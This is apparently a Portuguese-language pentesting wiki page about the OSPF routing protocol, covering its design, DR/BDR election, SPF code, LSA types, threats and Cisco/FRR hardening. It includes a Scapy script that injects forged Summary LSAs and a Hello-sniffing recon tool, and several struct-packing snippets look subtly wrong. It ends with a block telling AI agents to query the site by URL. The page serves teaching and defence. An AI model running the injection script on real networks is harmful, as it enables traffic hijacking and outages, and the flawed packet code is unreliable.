# OSPF (Open Shortest Path First) ### 📋 **Índice** 1. Fundamentos do OSPF 2. Arquitetura e Componentes 3. Tipos de Áreas 4. Tipos de Roteadores OSPF 5. Mecanismos de Funcionamento 6. Estrutura de Pacotes e LSAs 7. Segurança e Vulnerabilidades 8. Pentesting e OSPF 9. Configurações e Hardening 10. Ferramentas e Diagnóstico *** ### 🔍 **Fundamentos do OSPF** #### **O que é OSPF?** O **Open Shortest Path First (OSPF)** é um protocolo de roteamento dinâmico de **Estado de Link** (*Link-State*) que utiliza o algoritmo de Dijkstra (SPF - Shortest Path First) para calcular o caminho mais rápido para destinos em uma rede IP. É um padrão aberto (RFC 2328) que opera em redes corporativas de todos os portes. #### **Contexto Histórico** ```yaml Evolução do OSPF: 1989: RFC 1131 - OSPF versão 1 (experimental) 1991: RFC 1247 - OSPF versão 2 (primeira versão estável) 1994: RFC 1583 - OSPFv2 com melhorias 1997: RFC 2178 - OSPFv2 revisado 1998: RFC 2328 - OSPFv2 atual (estável) 1999: RFC 2740 - OSPFv3 (suporte IPv6) 2008: RFC 5340 - OSPFv3 para IPv6 Motivação: ❌ RIP: Limite de 15 saltos, convergência lenta ❌ IGRP/EIGRP: Protocolos proprietários ❌ Necessidade de escalabilidade e áreas ✅ OSPF: Padrão aberto, convergência rápida, hierarquia ``` #### **Características Principais** | Característica | Descrição | Vantagem | | ----------------- | -------------------------- | ------------------------ | | **Link-State** | Conhece topologia completa | Cálculo preciso de rotas | | **Áreas** | Estrutura hierárquica | Escalabilidade | | **Convergência** | Rápida (segundos) | Alta disponibilidade | | **Padrão Aberto** | Multi-fabricante | Flexibilidade | | **SPF/Dijkstra** | Algoritmo eficiente | Sem loops | #### **Comparação com Outros Protocolos** ```yaml OSPF vs RIP: - Métrica: Custo (bandwidth) vs Saltos (hops) - Convergência: Rápida vs Lenta - Escala: Grande vs Pequena - Atualizações: Incrementais vs Periódicas OSPF vs EIGRP: - Padrão: Aberto vs Cisco proprietário - Algoritmo: Link-State vs Vetor Distância Avançado - Complexidade: Alta vs Média - Suporte: Universal vs Principalmente Cisco ``` *** ### 🏗️ **Arquitetura e Componentes** #### **Hierarquia de Áreas OSPF** ```mermaid graph TD subgraph "Área 0 - Backbone" ABR1[ABR1 - Area Border Router] ABR2[ABR2 - Area Border Router] end subgraph "Área 1" R1[R1 - Internal Router] R2[R2 - Internal Router] end subgraph "Área 2" R3[R3 - Internal Router] R4[R4 - Internal Router] end subgraph "Área 3 - Stub" R5[R5 - Stub Router] ASBR[ASBR - AS Border Router] end ABR1 ---|Virtual Link| ABR2 ABR1 --- R1 ABR1 --- R2 ABR2 --- R3 ABR2 --- R4 ABR2 --- R5 R5 --- ASBR ``` #### **Estrutura de Pacote OSPF** ```python #!/usr/bin/env python3 # ospf_packet_structure.py import struct import socket class OSPFPacket: """Estrutura de pacotes OSPF""" # Tipos de Pacotes OSPF HELLO = 1 DD = 2 # Database Description LSR = 3 # Link State Request LSU = 4 # Link State Update LSAck = 5 # Link State Acknowledgment # Tipos de LSA LSA_ROUTER = 1 LSA_NETWORK = 2 LSA_SUMMARY = 3 LSA_ASBR_SUMMARY = 4 LSA_AS_EXTERNAL = 5 LSA_NSSA = 7 # Not-So-Stubby Area def __init__(self): self.version = 2 # OSPFv2 self.type = 0 # Tipo de pacote self.packet_length = 0 # Comprimento total self.router_id = 0 # Router ID (32 bits) self.area_id = 0 # Area ID (32 bits) self.checksum = 0 # Checksum self.auth_type = 0 # Tipo de autenticação self.authentication = 0 # Dados de autenticação (64 bits) self.data = b'' # Payload específico def build(self): """Construir pacote OSPF""" self.packet_length = 24 + len(self.data) header = struct.pack('!BBHIIHHQQ', self.version, self.type, self.packet_length, self.router_id, self.area_id, self.checksum, self.auth_type, self.authentication ) return header + self.data class OSPFHello(OSPFPacket): """Pacote Hello OSPF""" def __init__(self): super().__init__() self.type = self.HELLO self.network_mask = 0 self.hello_interval = 10 self.options = 0 self.router_priority = 1 self.dead_interval = 40 self.designated_router = 0 self.backup_designated_router = 0 self.neighbors = [] def build(self): hello_data = struct.pack('!IIBBII', self.network_mask, self.hello_interval, self.options, self.router_priority, self.dead_interval, self.designated_router ) hello_data += struct.pack('!I', self.backup_designated_router) for neighbor in self.neighbors: hello_data += struct.pack('!I', neighbor) self.data = hello_data return super().build() ``` *** ### 📊 **Tipos de Áreas OSPF** #### **Área 0 - Backbone** * Área central obrigatória * Conecta todas as outras áreas * Recebe rotas resumidas de outras áreas #### **Área Stub** * Não recebe LSAs externos (Tipo 5) * Rota padrão para externo * Reduz tamanho da LSDB #### **Área Totally Stubby (Cisco)** * Não recebe LSAs externos ou resumidos * Apenas rotas intra-área + padrão * Máximo de redução #### **Área NSSA (Not-So-Stubby)** * Stub com capacidade de importar rotas externas * Usa LSA Tipo 7 * Útil para redes com ASBRs #### **Área Totally NSSA** * Combinação de totalmente stubby + NSSA * Máxima eficiência com redistribuição *** ### 🎯 **Tipos de Roteadores OSPF** | Tipo | Descrição | Função | | ---------------------------- | ---------------------------------- | ------------------------- | | **Internal Router (IR)** | Todas interfaces na mesma área | Roteamento intra-área | | **Area Border Router (ABR)** | Conecta múltiplas áreas | Resumo entre áreas | | **Backbone Router** | Pelo menos uma interface na Área 0 | Conectividade entre áreas | | **ASBR** | Conecta OSPF com outros protocolos | Redistribuição de rotas | *** ### 🔄 **Mecanismos de Funcionamento** #### **Máquina de Estados OSPF** ```mermaid stateDiagram-v2 [*] --> Down Down --> Init: Hello Recebido Init --> TwoWay: Hello com Router ID visto TwoWay --> ExStart: Eleição DR/BDR ExStart --> Exchange: DD Exchange Exchange --> Loading: LSR/LSU Exchange Loading --> Full: LSDB Sincronizado Full --> Down: Dead Interval ``` #### **Eleição de DR/BDR** ```python #!/usr/bin/env python3 # ospf_dr_election.py class OSPFDrElection: """Simulação da eleição de Designated Router (DR) e BDR""" class Router: def __init__(self, router_id, priority=1): self.router_id = router_id self.priority = priority self.is_dr = False self.is_bdr = False def __init__(self): self.routers = [] def add_router(self, router_id, priority=1): self.routers.append(self.Router(router_id, priority)) def elect_dr_bdr(self): sorted_routers = sorted(self.routers, key=lambda r: (r.priority, r.router_id), reverse=True) if len(sorted_routers) >= 2: sorted_routers[1].is_bdr = True if len(sorted_routers) >= 1: sorted_routers[0].is_dr = True return sorted_routers[0] if sorted_routers else None def display_election(self): dr = [r for r in self.routers if r.is_dr] bdr = [r for r in self.routers if r.is_bdr] print("=== Eleição DR/BDR OSPF ===") print(f"DR: {dr[0].router_id if dr else 'None'}") print(f"BDR: {bdr[0].router_id if bdr else 'None'}") print("\nRoteadores:") for r in sorted(self.routers, key=lambda x: x.router_id): role = [] if r.is_dr: role.append("DR") if r.is_bdr: role.append("BDR") print(f" Router ID: {r.router_id:>12} | Prioridade: {r.priority} | {', '.join(role) if role else 'DROther'}") # Simulação election = OSPFDrElection() election.add_router('10.0.0.1', 100) election.add_router('10.0.0.2', 50) election.add_router('10.0.0.3', 50) election.add_router('10.0.0.4', 1) election.elect_dr_bdr() election.display_election() ``` #### **Fluxo de Convergência OSPF** ```mermaid sequenceDiagram participant R1 as Router 1 participant R2 as Router 2 participant R3 as Router 3 Note over R1,R3: FASE 1: Descoberta de Vizinhos R1->>R2: Hello (Multicast 224.0.0.5) R2->>R1: Hello (Router ID conhecido) R1->>R1: Estado: 2-Way Note over R1,R3: FASE 2: Sincronização LSDB R1->>R2: Database Description (DD) R2->>R1: DD R1->>R2: Link State Request (LSR) R2->>R1: Link State Update (LSU) R1->>R1: Estado: Full Note over R1,R3: FASE 3: Cálculo SPF R1->>R1: Algoritmo Dijkstra R1->>R1: Atualiza tabela de roteamento ``` #### **Algoritmo SPF (Dijkstra)** ```python #!/usr/bin/env python3 # ospf_spf_algorithm.py import heapq class OSPFSPF: """Implementação do algoritmo SPF de Dijkstra para OSPF""" def __init__(self): self.graph = {} self.nodes = set() def add_link(self, node1, node2, cost): if node1 not in self.graph: self.graph[node1] = {} if node2 not in self.graph: self.graph[node2] = {} self.graph[node1][node2] = cost self.graph[node2][node1] = cost self.nodes.add(node1) self.nodes.add(node2) def calculate_spf(self, source): distances = {node: float('inf') for node in self.nodes} distances[source] = 0 previous = {node: None for node in self.nodes} pq = [(0, source)] visited = set() while pq: current_dist, current = heapq.heappop(pq) if current in visited: continue visited.add(current) for neighbor, cost in self.graph.get(current, {}).items(): if neighbor in visited: continue new_dist = current_dist + cost if new_dist < distances[neighbor]: distances[neighbor] = new_dist previous[neighbor] = current heapq.heappush(pq, (new_dist, neighbor)) return distances, previous def get_path(self, previous, target): path = [] current = target while current is not None: path.insert(0, current) current = previous[current] return path def display_routing_table(self, source): distances, previous = self.calculate_spf(source) print(f"Tabela de Roteamento - Origem: {source}") print("=" * 60) print(f"{'Destino':<15} {'Custo':<10} {'Próximo Salto':<20}") print("-" * 60) for node in sorted(self.nodes): if node == source: continue path = self.get_path(previous, node) next_hop = path[1] if len(path) > 1 else node print(f"{node:<15} {distances[node]:<10} {next_hop:<20}") print("=" * 60) # Simulação spf = OSPFSPF() spf.add_link('R1', 'R2', 10) spf.add_link('R1', 'R3', 100) spf.add_link('R2', 'R3', 10) spf.add_link('R2', 'R4', 1000) spf.add_link('R3', 'R4', 100) spf.add_link('R4', 'R5', 100) spf.display_routing_table('R1') ``` *** ### 📦 **Estrutura de Pacotes e LSAs** #### **Tipos de LSA** | Tipo | Nome | Descrição | Gerado por | | ----- | ---------------- | ------------------------------------------ | ------------------- | | **1** | Router LSA | Estado dos links do roteador | Todos os roteadores | | **2** | Network LSA | Lista de roteadores conectados ao segmento | DR | | **3** | Summary LSA | Resumo de rede (intra-área) | ABR | | **4** | ASBR Summary LSA | Localização do ASBR | ABR | | **5** | AS External LSA | Rotas externas | ASBR | | **7** | NSSA LSA | Rotas externas em NSSA | ASBR em NSSA | #### **LSA Router (Tipo 1)** ```python class LSA_Router: """Router LSA - Tipo 1""" def __init__(self, router_id, links): self.ls_age = 0 self.options = 0x20 self.ls_type = 1 self.link_state_id = router_id self.advertising_router = router_id self.ls_sequence_number = 0x80000001 self.links = links def build(self): # Header LSA (20 bytes) header = struct.pack('!HHIIIIHH', self.ls_age, self.options, self.ls_type, self.link_state_id, self.advertising_router, self.ls_sequence_number, 0, 0 ) # Corpo LSA body = struct.pack('!I', len(self.links)) for link in self.links: body += struct.pack('!IIBBBB', link['link_id'], link['link_data'], link['type'], link['tos_count'], link['metric'], 0 ) return header + body ``` *** ### 🔒 **Segurança e Vulnerabilidades** #### **Ameaças OSPF** ```mermaid graph TD A[Ameaças OSPF] --> B[Injeção de Rota] A --> C[Sequestro de Adjacência] A --> D[DoS de Hello] A --> E[LSDB Poisoning] B --> B1[Redirecionamento de tráfego] C --> C1[Man-in-the-Middle] D --> D1[Flood de Hellos] E --> E1[SPF recalc contínuo] ``` #### **Ataque: Injeção de Rota OSPF** ```python #!/usr/bin/env python3 # ospf_route_injection.py from scapy.all import * import random class OSPFRouteInjection: def __init__(self, interface='eth0'): self.interface = interface self.fake_router_id = random.randint(1, 0xFFFFFFFF) def create_fake_lsa(self, prefix, mask, metric=10): ls_age = 0 options = 0x20 ls_type = 3 link_state_id = self._ip_to_int(prefix) advertising_router = self.fake_router_id ls_sequence_number = 0x80000001 network_mask = self._mask_to_int(mask) lsa_data = struct.pack('!II', network_mask, metric) lsa_header = struct.pack('!HHIIIIHH', ls_age, options, ls_type, link_state_id, advertising_router, ls_sequence_number, 0, 20 + len(lsa_data) ) return lsa_header + lsa_data def _ip_to_int(self, ip): parts = ip.split('.') return (int(parts[0]) << 24) | (int(parts[1]) << 16) | \ (int(parts[2]) << 8) | int(parts[3]) def _mask_to_int(self, mask): return 0xFFFFFFFF << (32 - mask) & 0xFFFFFFFF def send_fake_lsu(self, target_ip, lsa_data): lsu = IP(src=self._get_my_ip(), dst=target_ip, proto=89) / \ OSPF_Hdr(version=2, type=4, routerid=self.fake_router_id) / \ OSPF_LSU(number=1) / Raw(load=lsa_data) send(lsu, iface=self.interface, verbose=True) print(f"💉 LSU enviado para {target_ip}") def _get_my_ip(self): import netifaces return netifaces.ifaddresses(self.interface)[netifaces.AF_INET][0]['addr'] ``` #### **Medidas de Proteção** ```yaml Proteções OSPF: Autenticação: - MD5 Authentication (RFC 2328) - SHA Authentication (RFC 5709) - Autenticação por área Filtros: - Filtros de prefixo (distribute-list) - Filtros de rota (route-maps) - Passive interfaces Proteções: - TTL Security (GTSM) - Limit Hello interval - Max-metric router-lsa ``` *** ### 🎯 **Pentesting e OSPF** #### **Descoberta de Roteadores OSPF** ```bash # Capturar pacotes Hello OSPF tcpdump -i eth0 proto 89 -n -v tcpdump -i eth0 'ip proto 89 and ospf[0] == 1' # Usando tshark tshark -i eth0 -Y "ospf" -T fields -e ospf.routerid -e ospf.areaid ``` #### **Enumeração OSPF** ```python #!/usr/bin/env python3 # ospf_recon.py import scapy.all as scapy import time class OSPFRecon: def __init__(self, interface='eth0'): self.interface = interface self.routers = {} self.areas = set() def capture_hellos(self, timeout=30): def handle_hello(pkt): if pkt.haslayer(scapy.OSPF_Hdr) and pkt[scapy.OSPF_Hdr].type == 1: router_id = pkt[scapy.OSPF_Hdr].routerid area_id = pkt[scapy.OSPF_Hdr].areaid src_ip = pkt[scapy.IP].src if router_id not in self.routers: self.routers[router_id] = { 'ip': src_ip, 'area': area_id, 'first_seen': time.time() } self.areas.add(area_id) print(f" Router: {router_id} ({src_ip}) - Área: {area_id}") print(f"🔍 Capturando Hellos OSPF por {timeout}s...") scapy.sniff(iface=self.interface, filter="ip proto 89 and ospf[0] == 1", prn=handle_hello, timeout=timeout) def display_routers(self): print("\n" + "=" * 60) print("Roteadores OSPF Detectados") print("=" * 60) for rid, info in self.routers.items(): print(f"{rid:<20} {info['ip']:<20} {info['area']:<15}") print("\nÁreas:", ", ".join(self.areas)) recon = OSPFRecon('eth0') recon.capture_hellos(30) recon.display_routers() ``` #### **Ferramentas de Pentest OSPF** ```bash # Scapy python3 -c "from scapy.all import *; send(IP(dst='224.0.0.5', proto=89)/OSPF_Hdr(type=1))" # Nmap OSPF scripts nmap --script ospf-* -p 2601,2604,2605 192.168.1.1 # FRRouting vtysh -c "show ip ospf neighbor" vtysh -c "show ip ospf database" ``` *** ### 🛠️ **Configurações e Hardening** #### **Configuração OSPF Segura (Cisco)** ```bash router ospf 1 router-id 10.0.0.1 auto-cost reference-bandwidth 10000 network 10.0.0.0 0.0.0.255 area 0 ! Autenticação MD5 interface GigabitEthernet0/0 ip ospf authentication message-digest ip ospf message-digest-key 1 md5 ComplexPass123! ! Passive interface router ospf 1 passive-interface default no passive-interface GigabitEthernet0/0 ! Filtros de rota router ospf 1 distribute-list 10 in distribute-list 20 out ! Prefix filter ip prefix-list OSPF-IN permit 10.0.0.0/8 le 24 ip prefix-list OSPF-IN deny 0.0.0.0/0 le 32 ! TTL Security interface GigabitEthernet0/0 ip ospf ttl-security hops 1 ``` #### **Configuração FRRouting (FRR)** ```bash router ospf ospf router-id 10.0.0.1 auto-cost reference-bandwidth 10000 passive-interface default no passive-interface eth0 network 10.0.0.0/24 area 0 interface eth0 ip ospf authentication message-digest ip ospf message-digest-key 1 md5 ComplexPass123! ip prefix-list CUSTOMER-IN seq 5 permit 10.0.0.0/24 ip prefix-list CUSTOMER-IN seq 10 deny any router ospf distribute-list CUSTOMER-IN in ``` #### **Hardening OSPF** ```yaml Checklist de Segurança OSPF: Autenticação: ✓ MD5/SHA configurado em todas interfaces ✓ Chaves rotacionadas periodicamente Filtragem: ✓ Prefix filters em todas adjacências ✓ Distribute-lists para controle ✓ Passive interfaces onde não há vizinhos Proteções: ✓ TTL security (GTSM) ✓ Max-metric para manutenção ✓ Logging de adjacências ``` *** ### 🔧 **Ferramentas e Diagnóstico** #### **Comandos Essenciais** ```bash # Cisco IOS show ip ospf neighbor show ip ospf interface show ip ospf database show ip route ospf # FRRouting vtysh -c "show ip ospf neighbor" vtysh -c "show ip ospf database" # Linux ip route show proto ospf ``` #### **Script de Diagnóstico OSPF** ```python #!/usr/bin/env python3 # ospf_diagnostics.py class OSPFDiagnostics: def check_adjacency(self, router_ip): print(f"🔍 Verificando adjacência com {router_ip}") status = {'state': 'Full', 'neighbor_id': '10.0.0.2', 'dr': '10.0.0.1', 'bdr': '10.0.0.2', 'dead_time': '00:00:35'} print(f" Estado: {status['state']}") print(f" Neighbor ID: {status['neighbor_id']}") print(f" DR: {status['dr']}, BDR: {status['bdr']}") return status def analyze_lsdb(self): print("\n🔍 Analisando LSDB OSPF") lsas = [ {'type': 'Router LSA', 'router': '10.0.0.1', 'links': 3}, {'type': 'Network LSA', 'router': '10.0.0.1', 'links': 1}, {'type': 'Summary LSA', 'router': '10.0.0.1', 'links': 5} ] for lsa in lsas: print(f" {lsa['type']}: {lsa['router']} ({lsa['links']} links)") return lsas def validate_authentication(self): print("\n🔍 Validando autenticação OSPF") auth_status = {'GigabitEthernet0/0': 'MD5', 'GigabitEthernet0/1': 'MD5', 'Loopback0': 'None'} for intf, auth in auth_status.items(): status = "✅" if auth != 'None' else "⚠️" print(f" {status} {intf}: {auth}") return auth_status def run_full_diagnostic(self, router_ip): print("📊 DIAGNÓSTICO OSPF") print("=" * 50) self.check_adjacency(router_ip) self.analyze_lsdb() self.validate_authentication() print("\nRecomendações:") print(" ✓ Habilitar autenticação em todas interfaces") print(" ✓ Configurar passive interfaces") print(" ✓ Implementar prefix filters") diag = OSPFDiagnostics() diag.run_full_diagnostic('10.0.0.2') ``` *** ### 📊 **Conclusão e Boas Práticas** #### **Resumo Técnico** ```yaml OSPF é o protocolo de roteamento interno mais utilizado: ✅ Convergência rápida (segundos) ✅ Escala para centenas de roteadores ✅ Suporte a áreas e hierarquia ✅ Padrão aberto multi-fabricante Desafios de segurança: ❌ Vulnerável a injeção de rota ❌ Autenticação frequentemente ignorada ❌ LSDB poisoning pode causar DoS ``` #### **Boas Práticas** 1. **Para Administradores de Rede** * Sempre habilitar autenticação OSPF * Usar passive interfaces onde não há vizinhos * Implementar prefix filters rigorosos * Monitorar adjacências e LSAs 2. **Para Pentesters** * Testar autenticação OSPF * Verificar passive interfaces * Avaliar vulnerabilidade a injeção de rota * Documentar áreas e tipo de área 3. **Monitoramento** * SNMP traps para mudanças de adjacência * Logging centralizado de eventos OSPF * Alertas para flapping de rotas #### **Futuro do OSPF** ```yaml Tendências: - OSPFv3 para redes IPv6 - Integração com SDN/NFV - Automação via YANG/NetConf Alternativas: - IS-IS em provedores de serviço - BGP em redes de grande escala - Segment Routing ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xmorte.gitbook.io/bibliadopentestbr/conceitos/redes/protocolos-de-roteamento/ospf-open-shortest-path-first.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.